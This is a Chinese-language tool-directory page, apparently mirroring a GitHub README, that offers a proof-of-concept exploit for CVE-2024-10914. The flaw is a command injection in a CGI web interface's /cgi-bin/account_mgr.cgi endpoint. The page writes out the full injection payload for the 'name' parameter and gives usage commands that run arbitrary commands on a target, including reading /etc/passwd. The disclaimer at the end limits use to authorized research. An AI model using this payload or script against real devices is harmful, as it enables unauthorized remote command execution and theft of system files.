Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10914__POC — 用于利用 CVE-2024-10914 的 PoC。 | Kitploit
工具/GitHubGitHub/0xss3k/cve-2024-10914__poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

用于利用 CVE-2024-10914 的 PoC。

查看仓库
32个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10914 - 概念验证

针对 /cgi-bin/account_mgr.cgi 端点命令注入漏洞的利用程序。该漏洞允许通过未经过滤的参数在受影响系统上执行任意命令。

漏洞描述

CVE-2024-10914 是一个命令注入漏洞,影响具有 CGI Web 接口的设备。易受攻击的应用程序未正确验证 cgi_user_add 请求中的 name 参数,允许攻击者注入系统命令,这些命令将以应用程序的权限执行。

要求

  • Python 3.7+
  • requests 库

安装

克隆仓库并安装依赖:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

或手动安装:

root@kitploit:~
pip install requests

使用

脚本提供两个参数:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

参数

  • -u, --url(必需):目标 URL(例如:http://192.168.1.1)
  • -c, --command(可选):要执行的命令(默认:id)

示例

执行命令 id:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

执行自定义命令:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

列出文件:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

技术原理

该利用程序向易受攻击的端点发送带有以下 payload 的 GET 请求:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

空字符串被引号闭合,并注入所需命令,该命令在服务器上下文中执行。

响应

脚本将显示:

  • 连接状态
  • 发送的 payload
  • HTTP 状态码
  • 服务器的完整响应

法律警告

此代码仅用于教育和安全研究目的。仅应在您拥有明确授权的系统上使用。未经授权使用此利用程序可能违反当地法律并构成犯罪。作者不对滥用此工具的行为负责。

参考

  • CVE-2024-10914
  • CVSS 评分:待定

作者

SS3K

许可

未指定

下载工具